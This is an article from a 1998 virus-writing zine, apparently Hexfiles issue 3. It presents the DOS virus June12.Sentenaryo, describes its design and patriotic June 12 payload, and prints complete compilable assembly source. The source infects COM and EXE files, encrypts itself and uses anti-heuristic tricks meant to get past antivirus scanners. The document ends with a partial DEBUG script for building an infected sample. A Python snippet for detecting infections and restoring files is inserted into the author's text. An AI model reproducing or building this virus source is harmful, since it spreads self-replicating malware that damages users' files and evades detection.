Hexfiles Issue 3 File 010

HEX-FILES No. 3 File 010
════════════════════════════════════════════════════════════════════════

Virus Name : June12.Sentenaryo
Modified by: Putoksa Kawayan
Origin : Manila, Philippines
Date : May 1998


Da Background
~~~~~~~~~~~~~
Last year, I had this idea of writing a virus to mark the 100th year
of the Declaration of Independence of the Philippines -- a
commemorative virus. :) But I kept on putting it off, got bitten by
the "mañana" habit. I was frantic when I realized that Da Day, June
12, is just around the corner and I still got zilch.

While preparing the disassembly of June12 family for this issue, I
realized that what anyone could ask for in coming up with a
centennial virus is already there. It got the national anthem and the
national flag. What it needs is a message appropriate for the
occasion. And, that's the easiest part -- look into yourself and say
what you feel and believe in.

My thanks go to the author of the original June12, the most
nationalistic virus ever to come out of this 100-year-old republic.
Whoever you are, mabuhay ka kapatid.


Da Virus
~~~~~~~~
June12.Sentenaryo is based on June12.Standard.2660, that is, I used
this variant as a shell in creating Sentenaryo. I chopped codes here
and added some there to create an 1898-byte virus. (1898 being the
year Philippine Independence was declared.) I tried to preserve the
"look and feel" of the original and, as much as possible, use the
original codes. However, if you are going to make changes, it's going
to show somewhere, somehow.

It goes memory resident reserving 4144 bytes of memory. Considering
its length, Sentenaryo requires more memory than the original. This
is because it already reserved the memory required for infection
unlike the original which allocates it when necessary.

It hooks Int 21 and infection is triggered on read-only file open
(21/3d00) and program execution (21/4b00). Calls for get system date
(21/2a) are also screened for the content of DX, which serves as the
virus "are you there?" call. If DX contains 1998, the call is
returned with 1898 in DX. This is the reverse of what Kontragapi
does.

Just like the original virus, it infects COMs and EXEs with the
exception of COMMAND.COM. Its infective length is 1898 to 1913 bytes
in EXEs and 1909 to 1924 bytes in COM. The virus is appended to files
in all cases. However, the way COMs are infected was changed. The
original shifts the host by 11 bytes while Sentenaryo overwrites the
first 10 bytes of the host but saves the overwritten portion.

Even if the original virus is encrypted, it is not entirely
encrypted. On the other hand, Sentenaryo is fully encrypted save for
the decryptor and the anti-debug routine. This anti-debugging routine
is from the original but is placed where its effectiveness could be
maximized against heuristic scanners -- the virus entry point. This
made AVP and F-Prot look like the lamest AVs out there. However,
Thunderbyte got wise to it and its flags lighted up the screen. This
doesn't mean that Thunderbyte can't be blinded but I would go over
1898 bytes (even if I simplified the payload text, stripped off
unnecessary codes and removed my name) if I went for it. Anyway, I did
not intend this to be anti-heuristics but only put to good use what
is already in existence.
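
The COM layout and the unencrypted decryptor described above are
enough to triage a suspect file and recover the host's first 10 bytes.
The Python below is an added example, not part of the original article
or the virus listing; its function names and the constructed sample
are hypothetical, and it assumes the variant keeps the listing's
jumper and decryptor instruction sequences.

```python
import re

BODY_LEN = 1898    # virus body length stated in the article
JUMPER_LEN = 10    # VirusJumperLen: bytes overwritten at the start of a COM
PSP_PARAS = 16     # a COM image is loaded 100h bytes (16 paragraphs) above CS

# mov ax,cs / add ax,imm16 / push ax / push imm16 / retf   (VirusJumper)
JUMPER_RE = re.compile(rb"\x8c\xc8\x05(..)\x50\x68(..)\xcb", re.DOTALL)
# mov al,[si] / xor al,imm8 / mov [si],al / inc si   (InitLop, left in the clear)
DECRYPT_RE = re.compile(rb"\x8a\x04\x34(.)\x88\x04\x46", re.DOTALL)


def triage_com(image):
    """Return a findings dict if a COM image has the Sentenaryo layout, else None."""
    m = JUMPER_RE.match(image)
    if m is None:
        return None
    seg_delta = int.from_bytes(m.group(1), "little")
    entry = int.from_bytes(m.group(2), "little")
    if seg_delta < PSP_PARAS or entry >= BODY_LEN:
        return None
    # The jumper's segment delta encodes where the appended body starts.
    body_off = (seg_delta - PSP_PARAS) * 16
    # Appended block = body + masked copy of the host's first 10 bytes.
    if len(image) - body_off != BODY_LEN + JUMPER_LEN:
        return None
    body = image[body_off:body_off + BODY_LEN]
    # The decryptor sits before the entry point and carries the XOR mask
    # that also covers the saved host bytes.
    d = DECRYPT_RE.search(body, 0, entry)
    if d is None:
        return None
    key = d.group(1)[0]
    saved = image[body_off + BODY_LEN:]
    return {
        "body_offset": body_off,
        "entry": entry,
        "xor_key": key,
        "original_head": bytes(b ^ key for b in saved),
    }


def restore_host(image, finding):
    """Put the recovered 10 bytes back and cut off the appended block.

    The 1..16 alignment bytes in front of the body cannot be told apart
    from host data, so they stay at the end of the restored file.
    """
    return finding["original_head"] + image[JUMPER_LEN:finding["body_offset"]]


def constructed_sample(host, key, entry=0x40, decryptor_at=0x20):
    """Constructed test input: same layout, zero filler instead of any code."""
    body_off = (len(host) & ~0xF) + 16          # host padded to next paragraph
    body = bytearray(BODY_LEN)
    body[decryptor_at:decryptor_at + 7] = (
        b"\x8a\x04\x34" + bytes([key]) + b"\x88\x04\x46")
    jumper = (b"\x8c\xc8\x05" + (body_off // 16 + PSP_PARAS).to_bytes(2, "little")
              + b"\x50\x68" + entry.to_bytes(2, "little") + b"\xcb")
    masked_head = bytes(b ^ key for b in host[:JUMPER_LEN])
    return (jumper + host[JUMPER_LEN:] + bytes(body_off - len(host))
            + bytes(body) + masked_head)


if __name__ == "__main__":
    host = bytes(range(256)) + bytes(232)        # constructed 488-byte "host"
    image = constructed_sample(host, 0x2B)
    finding = triage_com(image)
    print(finding)
    print(restore_host(image, finding)[:len(host)] == host)
```

The size check is what keeps the jumper pattern from matching
unrelated COM files: growth is always 1908 bytes plus 1 to 16 bytes of
alignment, which is the 1909 to 1924 range given above.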

Aside from the payload text, you will find a text attributing this
variant to me:

"Isinaayos ni Putoksa Kawayan"

which translates to "Arranged by Putoksa Kawayan" but was intended to
mean "Modified by Putoksa Kawayan".


Da Payload
~~~~~~~~~~
The payload is triggered on June 12th when a program is executed. On
that day, all program executions are preceded by the display of the
Philippine National Flag and messages, and a rendition of the
Philippine National Anthem.

The messages in the original virus were changed to:


" M A B U H A Y

Republika ng Pilipinas
1898 * Ika-12 ng Hunyo * 1998

Kalayaan * ISANG DAANG TAON * Kasarinlan"

The text is in the colors of the Philippine flag -- red, white, blue
(both normal and bright/light text mode shades) and yellow. In
addition, "M A B U H A Y" and "ISANG DAANG TAON" are blinking. You
will find the translation of this message near the end of HEXFILE3.000.

A question, in red, appears below the flag:

" Kapatid, anong nagawa mo para sa bayan?"

"Kapatid" is a genderless word meaning brother or sister depending on
who you are addressing it to. The rest of the question is addressed
to my fellow Filipinos who should think about this remark, not only
in this Centennial year, but for the rest of our lives.

For non-Filipinos who want to know what this question means, please
ask a Filipino you know to translate this for you. Then ask him/her
what his/her answer to the question is.




Aling pag-ibig pa ang hihigit kaya
kaysa pag-ibig sa tinubuang lupa
-- Andres Bonifacio



── J12SENT.ASM STARTS HERE ─────────────────────────────────────────

;──────────────────────────────────────────────────────────────────────────
;──────────────────────────────────────────────────────────────────────────
;───── Virus Name: June12.Sentenaryo ──────────────────────────────────────
;───── Lamer     : Putoksa Kawayan ────────────────────────────────────────
;───── Origin    : Manila, Philippines ────────────────────────────────────
;───── Date      : May 1998 ───────────────────────────────────────────────
;──────────────────────────────────────────────────────────────────────────
;──────────────────────────────────────────────────────────────────────────
;────────────────────────────── This source code can be compiled using   ──
;───── COMPILING   ──────────── A86 4.02, TASM 2.01 or MASM 5.0.         ──
;───── INSTRUCTION ──────────── TASM and MASM produces the same output   ──
;────────────────────────────── (variant A). A86 produces a somewhat     ──
;────────────────────────────── different output (variant B).            ──
;──────────────────────────────                                          ──
;────────────────────────────── Compile to EXE.                          ──
;──────────────────────────────────────────────────────────────────────────
;──────────────────────────────────────────────────────────────────────────

dta struc
DriveCode db ? ;< do not touch this ;; this is ;;
MaskFileName db 8 dup (?) ;< portion if you are ;; documented ;;
MaskFileExt db 3 dup (?) ;< going to search for ;; as reserved ;;
RestOfReserved db 9 dup (?) ;< another file!!! ;; for DOS ;;
FileAttribute db ?
FileTime dw ?
FileDate dw ?
FileLengthLow dw ?
FileLengthHigh dw ?
FileName db 2 dup (?)
FileNameMM db 6 dup (?)
ExtCommand db 4 dup (?)
EndDta db ?
dta ends

ExeHeader struc
ExeID dw ?
PageMod dw ?
PageCount dw ?
RelTab dw ?
HedSize dw ?
MinPara dw ?
MaxPara dw ?
SSeg dw ?
SPt dw ?
CxSum dw ?
CPt dw ?
CSeg dw ?
ExeHeader ends

.286
Sentenaryo segment 'code'
assume cs:Sentenaryo, ds:Sentenaryo

blue equ 1
red equ 4
white equ 7
ltblue equ 9
ltred equ 12
yellow equ 14
btwhite equ 15
blink equ 80h

Environment equ 2ch
MotorTimeOut equ 440h
TimerTick equ 46ch

TraceTrap equ (offset NoTrace-Offset AntiTrace)-2
VirusJumperLen equ offset isErr-offset VirusJumper
MemRequired equ ((offset FirstGeneration-offset ThisIsSentenaryo)/16)+17
VirusStack equ ((MemRequired-16)*16)

org 0
ThisIsSentenaryo: ;-- you can remove this I retained it because I dont
; want to mess up this prog when I move something
;
; Payload Data: Other than PayloadText, payload data came from the
; original virus except that they were moved around.
; I made sure that word-sized data are even aligned
;
Anthem01 dw offset Anthem05,offset Anthem05,offset Anthem04
dw offset Anthem04,offset Anthem06,offset Anthem03
dw offset Anthem06,offset Anthem03

Anthem02 dw offset Anthem09,offset Anthem09,offset Anthem08
dw offset Anthem08,offset Anthem10,offset Anthem07
dw offset Anthem11,offset Anthem07
;
; Format of FlagData --> high byte: number of times character is displayed
;                        low byte: character to display
;                        -1: end of flag data for row
;
FlagData dw 0220h,02dfh,2020h,-1
dw 0220h,012ah,0320h,02dfh,1c20h,-1
dw 0a20h,02dfh,1820h,-1
dw 0520h,015ch,01b3h,012fh,0620h,02dfh,1420h,-1
dw 0420h,01c4h,01c4h,010fh,01c4h,01c4h,0520h
dw 012ah,0320h,12dfh,-1
dw 0520h,012fh,01b3h,015ch,0620h,02dch,1420h,-1
dw 0a20h,02dch,1820h,-1
dw 0220h,012ah,0320h,02dch,1c20h,-1
dw 0220h,02dch,2020h,-1

Anthem03 dw 0d5bh,0e21h,0be4h,0d5bh,11cah,0be4h,0a98h,0a00h
dw 0a98h,0be4h,0a98h,0d5bh,0d5bh,0e21h,0be4h,0d5bh
dw 11cah,0be4h,0a98h,0a00h,0a98h,0be4h,002ch

Anthem04 dw 0d5bh,0e21h,0d5bh,0be4h,0be4h,11cah,11cah,0be4h
dw 0be4h,11cah,11cah,0a98h,096fh,08e9h,07f1h,08e9h
dw 0d5bh,0e21h,0d5bh,0be4h,0be4h,11cah,11cah,0be4h
dw 0be4h,11cah,11cah,0a98h,0a00h,0a98h,0be4h,0a98h
dw 0be4h,0d5bh,002ch

Anthem05 dw 0d5bh,0fdah,0d5bh,0a00h,0a00h,08e9h,08e9h,07f1h
dw 08e9h,0a00h,08e9h,07f1h,077eh,07f1h,08e9h,07f1h
dw 0a00h,08e9h,0a98h,0a98h,0a00h,002ch

Anthem06 dw 0d5bh,002ch
;
; Format: # [,cd,co] ,string ,0 [,0]
;
; # - char count of string to display (excluding delimiters)
; cd - set color flag (blink = sign bit set)
; co - color (blink = set blink attribute)
; string - string to display
; 0 - end of data for line, if 0,0 - end of text block
;
PayloadText db 13,blink,blue or blink,'M A B U H A Y',0
db 1,' ',0 ;------ skip one row
db 22,blink,yellow,'Republika ng Pilipinas',0
db 29,blink,ltblue,'1898 ',blink,yellow,'* ',blink
db btwhite,'Ika-12 ng Hunyo ',blink,yellow,'*'
db blink,ltred,' 1998',0
db 1,' ',0 ;------ skip one row
db 44,blink,yellow,'Kalayaan',blink,white,' * '
db blink,ltred or blink,'ISANG ',blink
db btwhite or blink,'DAANG ',blink,ltblue or blink
db 'TAON',blink,white,' * ',blink,yellow
db 'Kasarinlan'
db 0,0
db 39,blink,red,'Kapatid, anong nagawa mo para sa bayan?'
db 0,0

FlagColor db 70h,71h,10h,70h,7eh,70h,71h,10h,70h,71h,10h,70h,7eh
db 7eh,7eh,70h,71h,10h,70h,7eh,7eh,7eh,7eh,7eh,70h,7eh
db 70h,41h,70h,7eh,7eh,7eh,70h,74h,40h,70h,74h,40h,70h
db 7eh,70h,74h,40h,70h,74h,40h

Anthem07 db 12,9,3,12,12,4,4,4,9,3,12,12,12,9,3,12,12,4,4,4,9,3

Anthem08 db 4,4,4,9,3,9,3,9,3,9,3,9,3,9,3,12,4,4,4,9,3,9,3,9
db 3,9,3,4,4,4,4,4,4,12

Anthem09 db 4,4,4,12,12,12,12,9,3,9,3,12,4,4,4,12,12,12,9,3,36

Anthem10 db 12

Anthem11 db 24
;
; Decrypt virus executable code. Structure of decryptor retained
; from original virus.
;
MaskInit:
push ds
push cs
pop ds
mov si,offset Init
mov bp,((offset EndOfSentenaryo-offset ThisIsSentenaryo)+VirusJumperLen)
InitLop:mov al,[si]
IniMask:xor al,0
mov [si],al
inc si
cmp si,bp
InfChk: jne InitLop
pop ds
ret
;
; This will blind F-Prot's heuristic scanner. I initially placed this
; under encryption but when F-Prot detected the decryptor, I decided to
; place it in the open. Other heuristic scanners are also affected.
;
; Thunderbyte will be raising its heuristic flags. I could do something
; about this, other than the encryption of course, but I would go over
; 1898 bytes and I wouldn't want to do that.
;
; This was retained from the original virus.
;
SentenaryoEntry:
sub byte ptr cs:AntiTrace+1,TraceTrap
AntiTrace:
jmp short NoTrace
mov ah,4ch
int 21h

NoTrace:call MaskInit
;
; Code encryption starts here
;
Init: cld
mov dx,1998h ; memory self recognition
mov ah,2ah ; get system date
int 21h
cmp dx,1898h
jne NotResident
FileTyp:mov al,0 ; host type flag: 0 = com <>0 = exe
or al,al
jnz HostIsExe
push es ; restore and execute host com
push cs
pop ds
mov di,100h
push di
push es
mov si,offset EndOfSentenaryo
mov cx,VirusJumperLen
repe movsb
pop ds
retf

HostIsExe:
mov ax,es ; restore segments and pointers of host exe
add ax,16 ; and execute host
ExeSs: mov bx,0
add bx,ax
mov ss,bx
ExeSp: mov sp,0
ExeCs: add ax,1234h
push ax
ExeIp: mov ax,0
push ax
retf

NotResident:
push cs
pop ds
push cs
pop ss
mov sp,VirusStack
mov ax,es
xor si,si
mov byte ptr AntiTrace+1,TraceTrap
mov bx,offset EndOfSentenaryo
mov byte ptr [bx],0f3h
mov [Psp],ax
mov [Psp2],ax
mov [Psp3],ax
add ax,16
mov es,ax
mov cx,((offset EndOfSentenaryo-offset ThisIsSentenaryo)/2)+1
mov di,si
mov word ptr [bx+1],0cba5h
push es
push offset ContinueInit
jmp bx ; move virus to Psp:100

ExecParam dw ?,80h
Psp dw ?,5ch
Psp2 dw ?,6ch
Psp3 dw ?

ContinueInit:
mov ax,cs
mov ss,ax
mov ds,ax
mov ax,3521h ; save and hook int 21
int 21h
mov word ptr DosInterrupt,bx
mov word ptr DosInterrupt+2,es
mov dx,offset isDos
mov ah,25h
int 21h
mov bx,MemRequired ; release extra mem
mov ah,4ah
mov es,Psp
int 21h
xor di,di
mov bx,offset ExecParam
mov ax,es:Environment[di]
mov [bx],ax
mov es,ax
mov cx,7fffh ; get host file name from
mov ax,di ; environment segment
FindFilename:
repne scasb
scasb
jne FindFilename
scasw
mov dx,di
mov ah,4bh
push es
pop ds
push cs ; execute host
pop es
pushf
call dword ptr cs:DosInterrupt
push cs
pop ss
mov sp,VirusStack
mov ah,4dh ; get return code...
int 21h
push ax ; ...and save
mov es,cs:ExecParam
mov ah,49h ; release environment segment
int 21h
pop ax ; retrieve return code
mov ah,31h
mov dx,MemRequired ; tsr
int 21h

MaskData: ; encrypt/decrypt payload data
push ax
push si
xor si,si
MaskDat:mov ah,9ch
DataLop:mov al,[si]
xor al,ah
mov [si],al
inc si
cmp si,offset MaskInit
jne DataLop
pop si
pop ax
ret

isTheDay:
pusha
mov ah,2ah ; get system date
int 21h
cmp dx,60ch ; is it June 12th?
jne IsNot
push ds ; ...if so, then show payload
push es
push cs
pop ds
call ShowPayload
pop es
pop ds
IsNot: popa
ret
;
;------------------------------ int 21 handler
;
isDos: pushf
cmp ah,2ah ; get system date = self rec
je isSelfRecMem
cmp ax,4b00h ; exec
je SetUpForInfection
cmp ah,3dh ; file open
je SetUpForInfection
PassToDos:
popf
db 0eah
DosInterrupt dd ?

isSelfRecMem:
cmp dx,1998h ; verify if call is self rec
jne PassToDos ; if no, execute function
mov dh,18h ; else, return sel_rec_id
popf
iret

SetUpForInfection:
pusha
push ds
push es
call MaskHandler ; decrypt infection routine
MaskHandlerStart:
cld
mov ah,2fh ; save active dta
int 21h
push bx
push es
push dx
push ds
push cs
pop ds
mov dx,offset MyDta ; set up our own
mov ah,1ah
int 21h
mov si,dx
pop ds
pop dx
mov ah,4eh ; load to dta data of file
mov cx,27h
int 21h
pop ds
pop dx
mov ah,1ah ; restore saved dta
int 21h
push cs
pop ds ; get drive number from dta
mov al,[si]
mov dl,al
add al,'A'-1 ; convert to drive letter
mov ah,':'
mov word ptr Caller,ax ; init asciiz
mov ah,36h
int 21h
jc HopToEnd

DetermineFreeSpace:
mul bx
mul cx
or dx,dx
jnz EnoughDiskSpace
cmp ax,((offset EndOfSentenaryo-offset ThisIsSentenaryo)+VirusJumperLen)
jb HopToEnd
EnoughDiskSpace:
push cs
pop es
mov cx,3
lea di,MaskFileExt[si]
mov si,offset Command
mov byte ptr FileTyp+1,ch
push cx
push si
push di
repe cmpsb ; is file com?
pop di
pop si
pop cx
jne CheckIfExe ; no, then check if it is exe
add cl,4 ; else, check if command.com
sub di,cx ; we won't infect command.com
dec di
repe cmpsb
jne PrepareToInfect
HopToEnd:
jmp NoErrorRestore

AlterBy db 'Isinaayos ni ' ; I include this text to make the virus
WhoIsMe db 'Putoksa Kawayan' ; length 1898 bytes. I'll go over this
; if I instead add other things

CheckIfExe:
mov si,offset Exe ; is file exe?
repe cmpsb
jne HopToEnd
PrepareToInfect:
mov si,offset MyDta.FileName
mov di,offset CallerName
mov cl,13 ; copy file name to our asciiz
repe movsb
mov ax,3524h ; save and hook int 24
int 21h
mov ah,25h
mov dx,offset isErr
push es
push bx
push ax
int 21h
push cs
pop es
mov dx,offset Caller ; clear file attribute
xor cx,cx
mov ax,4301h
int 21h
jnc OpenFile
HopToErr:
jmp RestoreErrorInterrupt

Command db 'COMMAND'
Exe db 'EXE'

OpenFile:
mov ax,3d02h ; open file
pushf
call dword ptr cs:DosInterrupt
jc HopToErr
xchg bx,ax
mov cx,-1
mov dx,-((offset EndOfSentenaryo-offset InfChk)+VirusJumperLen)
mov ax,4202h
int 21h
jnc ReadForCheck ; set file pointer to where virus'
HopToClose: ; unencrypted code is supposed to be
jmp CloseFile

MaskForInfection:
push si
call MaskData ; decrypt payload data
xor ah,ah
int 1ah
xchg ax,dx
or al,1 ; make sure we wont get a zero
mov byte ptr ds:IniMask+1,al ; set virus init encryption mask
mov dl,al
add al,ah
or al,1 ; make sure we wont get a zero
mov byte ptr ds:MaskDat+1,al ; set payload data encryption mask
xor al,ah
or al,1 ; make sure we wont get a zero
mov byte ptr ds:HanMask+1,al ; set int handler encryption mask
mov dh,al
call MaskData ; encrypt payload data with new mask
mov di,offset EncryptBuff
push di ; copy virus to encryption buffer
xor si,si
mov cx,offset EndOfSentenaryo
repe movsb
mov si,(offset EncryptBuff+(offset MaskHandlerStart-offset ThisIsSentenaryo))
mov bp,(offset EncryptBuff+(offset MaskHandlerEnd-offset ThisIsSentenaryo))
Inf1Lop:mov al,[si]
xor al,dh ; encrypt int handler
mov [si],al
inc si
cmp si,bp
jne Inf1Lop
mov si,(offset EncryptBuff+(offset Init-offset ThisIsSentenaryo))
mov bp,(offset EncryptBuff+(offset EndOfSentenaryo-offset ThisIsSentenaryo))
cmp byte ptr FileTyp+1,0
jne Inf2Lop
add bp,10 ;--- VirusJumperLen, take note when modifying
Inf2Lop:mov al,[si] ; encrypt rest of virus
xor al,dl
mov [si],al
inc si
cmp si,bp
jne Inf2Lop
pop di
pop si
ret

ReadForCheck:
mov cx,((offset Init-offset InfChk)+VirusJumperLen)
mov dx,offset EncryptBuff
mov ah,3fh ; read for infection check
int 21h
jc HopToClose
mov cx,(offset Init-offset InfChk)
mov di,dx
mov si,offset InfChk
push cx
push si
push di
repe cmpsb ; check for com infection
pop di
pop si
pop cx
SkipHopToClose:
je HopToClose
add di,10 ;--- VirusJumperLen, take note when modifying
repe cmpsb
je SkipHopToClose ; check for exe infection
NotInfected:
call MovePointerStart
mov cl,28
mov dx,offset ReadBuffer ; read start of file
mov ah,3fh
int 21h
mov si,dx
mov di,16
mov ax,'ZM' ; is it exe?
cmp [si],ax
je isExe
;
;------------------------------------------- com infection
;
mov ax,MyDta.FileLengthLow
and al,0f0h
add ax,di ; align length to para
push ax
shr ax,4 ; and convert to segment
add ax,di
mov word ptr ds:VirSeg+1,ax ; set virus segment
call MaskForInfection ; encrypt
pop dx
call MovePointerCom ; move pointer to eof
mov dx,di
mov cx,((offset EndOfSentenaryo-offset ThisIsSentenaryo)+VirusJumperLen)
mov ah,40h
int 21h ; write encrypted virus
jc HopToTimeDate
call MovePointerStart ; move pointer to start of file
mov cx,VirusJumperLen
mov dx,offset VirusJumper
mov ah,40h ; write jump to virus
int 21h
HopToTimeDate:
jmp SetTimeDate ; clean up things

VirusJumper:
mov ax,cs
VirSeg: add ax,0
push ax
push offset SentenaryoEntry
retf

isErr: mov al,0 ; int 24 handler
iret

MovePointerStart:
xor dx,dx
MovePointerCom:
xor cx,cx
MovePointer:
mov ax,4200h
int 21h
ret
;
;------------------------------------------- exe infection
;
isExe: mov byte ptr FileTyp+1,al ; set file type flag
xor cx,cx
mov bp,512
mov ax,SSeg[si] ; save header segments and pointers
mov word ptr ExeSs+1,ax
mov ax,SPt[si]
mov word ptr ExeSp+1,ax
mov ax,CPt[si]
mov word ptr ExeIp+1,ax
mov ax,CSeg[si]
mov word ptr ExeCs+1,ax
mov ax,PageCount[si] ; get file size from header
cmp PageMod[si],cx ; this will lead to problems
je PageAligned ; if file has internal overlay
dec ax
PageAligned:
mul bp
add ax,PageMod[si]
adc dx,cx ; align to para
dec di
add ax,di
adc dx,cx
inc di
and al,0f0h
push ax
push dx
add ax,offset EndOfSentenaryo
adc dx,cx
div bp
or dx,dx
jz AlignedToPage
inc ax
AlignedToPage:
mov PageCount[si],ax ; set infected header entries
mov PageMod[si],dx
pop dx
pop ax
push ax
push dx
div di
sub ax,HedSize[si]
mov CSeg[si],ax
mov CPt[si],offset SentenaryoEntry
add ax,(offset EndOfSentenaryo-ThisIsSentenaryo)/16
mov SSeg[si],ax ;/-------- this will suppress thunderbyte's
mov SPt[si],bp ;\-------- "inconsistent exe-header" flag
call MaskForInfection ; encrypt virus
pop cx
pop dx
call MovePointer ; move pointer to eof
mov dx,di
mov cx,offset EndOfSentenaryo
mov ah,40h
int 21h ; write encrypted virus
jc SetTimeDate
call MovePointerStart ; move pointer to start of file
mov cl,28
mov dx,si
mov ah,40h ; write infected exe header
int 21h
SetTimeDate:
mov ax,5700h ; preserve file time/date stamp
int 21h
inc ax
int 21h
CloseFile:
mov ah,3eh ; close file
int 21h
xor ch,ch
mov cl,ds:MyDta.FileAttribute
mov dx,offset Caller
mov ax,4301h ; restore file attribute
int 21h
RestoreErrorInterrupt:
pop ax
pop dx
pop ds
int 21h ; restore int 24
NoErrorRestore:
call MaskHandler ; encrypt int 21 handler
MaskHandlerEnd:
pop es
pop ds
popa
cmp ah,4bh ; is it exec?
jne NotExec
call isTheDay ; check if june 12th
NotExec:jmp PassToDos

ShowIt: push cx ; display char
mov cl,ah
mov ah,9
int 10h
pop cx
EndText:ret
; show payload text
ShoText:inc dh
lodsb
or al,al ; end of text block?
jz EndText
mov dl,80
sub dl,al
shr dl,1
mov ah,2 ; center text
int 10h
NxtChar:lodsb
or al,al
jz ShoText ; end of row?
jns ShoChar ; text color set flag?
lodsb
mov bl,al ; set color
jmp NxtChar
ShoChar:mov ah,1
call ShowIt ; show character
inc dl
mov ah,2 ; move cursor next column
int 10h
jmp NxtChar

ShowPayload:
mov ax,3 ; set video mode to 3
int 10h
push cs
pop ds
mov ah,3 ; get cursor size and save
xor bh,bh
int 10h
push cx
mov ah,1 ; hide cursor
mov cx,201h
int 10h
call MaskData ; decrypt payload data
sti
xor cx,cx ; show PayloadText
mov bh,cl
mov dh,bh
mov si,offset PayloadText
call ShoText
mov dh,19
call ShoText ; show second block of text

mov dx,916h ; draw flag
mov si,offset FlagData
mov di,offset FlagColor
mov cx,9
MoveCur:mov ah,2
int 10h
lodsw
cmp al,-1
je NextRow
add dl,ah
mov bl,[di]
call ShowIt
inc di
jmp MoveCur
NextRow:inc dh
mov dl,22
loop MoveCur

mov bx,0c350h ; play the anthem
mov al,bl
out 40h,al
mov al,bh
out 40h,al
in al,61h
push ax
mov cx,8
NxtNote:mov di,cx
dec di
shl di,1
mov si,[di]
mov di,[di+(Anthem02-Anthem01)]
push cx
call Player
pop cx
loop NxtNote
pop ax
out 61h,al
xor al,al
out 40h,al
out 40h,al
xor ax,ax
mov ds,ax
mov di,MotorTimeOut
mov byte ptr [di],1
xor bh,bh
xor dx,dx
mov ah,2
int 10h ; move cursor to upper left corner
cli
mov al,byte ptr ds:TimerTick
or al,1
push cs ; change payload data mask
pop ds ; this is not necessary but....
mov byte ptr MaskDat+1,al
call MaskData ; encrypt payload data
mov ax,700h
mov bh,ah
xor cx,cx
mov dx,184fh
int 10h ; clear screen
pop cx
mov ah,1
int 10h ; restore cursor
ret

Player: mov bx,[si]
mov al,0b6h
out 43h,al
mov ax,bx
out 42h,al
xchg ah,al
out 42h,al
in al,61h
or al,3
out 61h,al
mov cl,[di]
push ds
push si
xor ax,ax
mov ds,ax
mov si,MotorTimeOut
mov [si],cl
Tuner: cmp [si],al
jne Tuner
pop si
pop ds
add si,2
inc di
cmp byte ptr [si],2ch
jne Player
ret

MaskHandler: ; encrypt/decrypt int handler
push ds
push cs
pop ds
mov si,offset MaskHandlerStart
mov bp,offset MaskHandlerEnd
HanMask:mov ah,0
HandLop:mov al,[si]
xor al,ah
mov [si],al
inc si
cmp si,bp
jne HandLop
pop ds
ret

EndOfSentenaryo:

CallerAsciiz dd ?
EncryptBuff db (EndOfSentenaryo-ThisIsSentenaryo) dup (?)
ReadBuffer db (28-21) dup (?)
MyDta db 43 dup (?)
Caller db ?,?
CallerName db 13 dup (?)
;
; To simplify the next two lines, use "align 16" instead.
; But, a86 does not recognize the "align" directive.
;
LengthToHere equ $-ThisIsSentenaryo
ParaAlign db ((((LengthToHere+15)/16)*16)-LengthToHere) dup (?)

FirstGeneration:
mov ax,cs
mov ss,ax
mov sp,offset FirstGeneration
mov ds,ax
mov dx,1998h ; check if in memory
mov ah,2ah
int 21h
cmp dx,1898h
jne Pers2
call Pers1 ; beep three times if yes
call Pers1
call Pers1
mov ax,4cffh ; terminate
int 21h
even
Pers1: mov ax,0e07h ; beeper
xor bx,bx
int 10h
ret
even
Pers2: xor ax,ax ; set encryption mask
mov ds,ax
mov ax,ds:TimerTick
or ax,101h
mov byte ptr cs:HanMask+1,al
mov byte ptr cs:MaskDat+1,ah
push cs
pop ds
call MaskHandler ; encrypt int handler
call MaskData ; encrypt payload data
mov ax,es:Environment
mov es,ax
mov ah,49h ; release environment segment
int 21h
mov ax,3521h ; save and hook int 21
int 21h
mov word ptr DosInterrupt,bx
mov word ptr DosInterrupt+2,es
mov dx,offset isDos
mov ax,2521h
int 21h
call Pers1 ; beep once
mov ax,3100h
mov dx,MemRequired
int 21h ; tsr

Sentenaryo ends

end FirstGeneration

── J12SENT.ASM ENDS HERE ───────────────────────────────────────────



The virus in this infected file was compiled in TASM 2.01.


ÄÄ J12SENTA.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

N J12SENTA.COM
E 0100 8C C8 05 2F 00 50 68 88 02 CB 61 62 75 68 61 79
E 0110 21 0D 0A 0A 54 68 69 73 20 69 73 20 4A 75 6E 65
E 0120 31 32 2E 53 65 6E 74 65 6E 61 72 79 6F 2E 31 38
E 0130 39 38 2E 41 20 76 69 72 75 73 20 63 6F 6D 69 6E
E 0140 67 20 74 6F 20 79 6F 75 20 66 72 6F 6D 20 74 68
E 0150 65 20 50 68 69 6C 69 70 70 69 6E 65 73 2E 0D 0A
E 0160 42 72 6F 75 67 68 74 20 74 6F 20 79 6F 75 20 6C
E 0170 69 76 65 20 62 79 20 48 45 58 2D 46 49 4C 45 53
E 0180 20 4E 6F 2E 20 33 0D 0A 0A 48 45 58 2D 46 49 4C
E 0190 45 53 20 61 6E 64 20 50 75 74 6F 6B 73 61 20 4B
E 01A0 61 77 61 79 61 6E 20 61 72 65 20 6E 6F 74 20 72
E 01B0 65 73 70 6F 6E 73 69 62 6C 65 20 66 6F 72 20 61
E 01C0 63 74 75 61 6C 2C 20 69 6D 70 6C 69 65 64 0D 0A
E 01D0 61 6E 64 2F 6F 72 20 69 6D 61 67 69 6E 61 72 79
E 01E0 20 64 61 6D 61 67 65 20 61 72 69 73 69 6E 67 20
E 01F0 64 69 72 65 63 74 6C 79 20 6F 72 20 69 6E 64 69
E 0200 72 65 63 74 6C 79 20 66 72 6F 6D 20 74 68 65 20
E 0210 75 73 65 2C 20 6D 69 73 75 73 65 0D 0A 6F 72 20
E 0220 6E 6F 6E 2D 75 73 65 20 6F 66 20 74 68 69 73 20
E 0230 70 72 6F 67 72 61 6D 2E 20 54 68 65 20 70 65 72
E 0240 73 6F 6E 20 77 68 6F 20 65 78 65 63 75 74 65 73
E 0250 20 74 68 69 73 20 70 72 6F 67 72 61 6D 20 62 65
E 0260 61 72 73 20 66 75 6C 6C 0D 0A 72 65 73 70 6F 6E
E 0270 73 69 62 69 6C 69 74 79 20 66 6F 72 20 68 69 73
E 0280 2F 68 65 72 20 61 63 74 69 6F 6E 73 2E 0D 0A 0A
E 0290 54 68 69 73 20 70 72 6F 67 72 61 6D 20 69 73 20
E 02A0 73 74 72 69 63 74 6C 79 20 66 6F 72 20 65 64 75
